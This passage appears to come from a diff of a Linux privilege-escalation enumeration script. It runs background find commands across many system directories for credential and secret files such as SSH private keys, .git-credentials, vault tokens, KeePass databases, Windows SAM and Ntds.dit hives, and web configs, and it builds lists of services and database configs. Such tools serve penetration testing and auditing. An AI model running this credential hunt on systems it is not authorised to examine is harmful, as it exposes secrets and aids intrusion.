-name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"sess_*\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"agent*\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"ssh*config\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"appcmd.exe\" -o -name \"sites.ini\" -o -name \"*.gnupg\" -o -name \"wcx_ftp.ini\" -o -name \"krb5.conf\" -o -name \".htpasswd\" -o -name \"NetSetup.log\" -o -name \"KeePass.ini\" -o -name \"*.p12\" -o -name \"autologin\" -o -name \"unattend.xml\" -o -name \"pgadmin*.db\" -o -name \"krb5.keytab\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"*password*\" -o -name \"pg_hba.conf\" -o -name \"access.log\" -o -name \"*.sqlite\" -o -name \"storage.php\" -o -name \"drives.xml\" -o -name \"Ntds.dit\" -o -name \"bash.exe\" -o -name \"https-xampp.conf\" -o -name \"protecteduserkey.bin\" -o -name \".pypirc\" -o -name \"ffftp.ini\" -o -name \"accessTokens.json\" -o -name \"influxdb.conf\" -o -name \"access_tokens.json\" -o -name \"docker-compose.yml\" -o -name \".rhosts\" -o -name \"php.ini\" -o -name \"*.der\" -o -name \"*.timer\" -o -name \"unattend.inf\" -o -name \"passbolt.php\" -o -name \"software.sav\" -o -name \"*.pgp\" -o -name \"zabbix_agentd.conf\" -o -name \"*.ovpn\" -o -name \"SecEvent.Evt\" -o -name \"*.csr\" -o -name \"azureProfile.json\" -o -name \"Dockerfile\" -o -name \"backups\" -o -name \".erlang.cookie\" -o -name \"ftp.config\" -o -name \"ddclient.conf\" -o -name \"snmpd.conf\" -o -name \"printers.xml\" -o -name \"fastcgi_params\" -o -name \".ldaprc\" -o -name \"secrets.ldb\" -o -name \".env\" -o -name \"credentials.db\" -o -name \"security.sav\" -o -name \"sysprep.xml\" -o -name \"unattended.xml\" -o -name \"*.sqlite3\" -o -name \"racoon.conf\" -o -name \"pagefile.sys\" -o -name \"sess_*\" -o -name \"*.ftpconfig\" -o -name \"setupinfo\" -o -name \"*vnc*.xml\" -o -name \"config.php\" -o -name \"cloud.cfg\" -o -name \"docker.sock\" -o -name \"pgsql.conf\" -o -name \"*config*.php\" -o -name \"cesi.conf\" -o -name \"my.ini\" -o -name \"*vnc*.ini\" -o -name \"kadm5.acl\" -o -name \"passwd\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sssd.conf\" -o -name \"setupinfo.bak\" -o -name \"000-default.conf\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \"my.cnf\" -o -name \".sudo_as_admin_successful\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"winscp.ini\" -o -name \"debian.cnf\" -o -name \".git-credentials\" -o -name \".bashrc\" -o -name \".secrets.mkey\" -o -name \"software\" -o -name \"SAM\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"*.kdbx\" -o -name \"groups.xml\" -o -name \"sitemanager.xml\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"jetty-realm.properties\" -o -name \"RDCMan.settings\" -o -name \"*.swp\" -o -name \"rsyncd.conf\" -o -name \".plan\" -o -name \"*.rdg\" -o -name \"SYSTEM\" -o -name \"*.pfx\" -o -name \"*.jks\" -o -name \".wgetrc\" -o -name \"filezilla.xml\" -o -name \"scclient.exe\" -o -name \"error.log\" -o -name \"*credential*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \".lesshst\" -o -name \"AzureRMContext.json\" -o -name \"*vnc*.txt\" -o -name \"KeePass.enforced*\" -o -name \"access_tokens.db\" -o -name \"secrets.yml\" -o -name \"ftp.ini\" -o -name \".github\" -o -name \"autologin.conf\" -o -name \"kibana.y*ml\" -o -name \"*.pem\" -o -name \"index.dat\" -o -name \"postgresql.conf\" -o -name \"system.sav\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"ConsoleHost_history.txt\" -o -name \"https.conf\" -o -name \"wsl.exe\" -o -name \"database.php\" -o -name \"kcpassword\" -o -name \".git\" -o -name \".profile\" -o -name \"redis.conf\" -o -name \"iis6.log\" -o -name \"*.keyring\" -o -name \"id_dsa*\" -o -name \"*.service\" -o -name \"elasticsearch.y*ml\" -o -name \"ntuser.dat\" -o -name \"psk.txt\" -o -name \"backup\" -o -name \"*.socket\" -o -name \"mongod*.conf\" -o -name \"*.cer\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.viminfo\" -o -name \"mosquitto.conf\" -o -name \"rsyncd.secrets\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"server.xml\" -o -name \"sysprep.inf\" -o -name \".gitconfig\" -o -name \"settings.php\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \"anaconda-ks.cfg\" -o -name \"*.keystore\" -o -name \"datasources.xml\" -o -name \"recentservers.xml\" -o -name \"vault-ssh-helper.hcl\" -o -name \"known_hosts\" -o -name \"*vnc*.c*nf*\" -o -name \"id_rsa*\" -o -name \"legacy_credentials.db\" -o -name \"ipsec.conf\" -o -name \"httpd.conf\" -o -name \"default.sav\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"gitlab.yml\" -o -name \".*_history.*\" -o -name \"db.php\" -o -name \".vault-token\" -o -name \"scheduledtasks.xml\" -o -name \"zabbix_server.conf\" -o -name \"credentials\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"hostapd.conf\" -o -name \"authorized_hosts\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mysql$" | sort | uniq | head -n 70) - PSTORAGE_MARIADB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) - PSTORAGE_APACHE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) - PSTORAGE_PHP_SESSIONS=$(echo -e 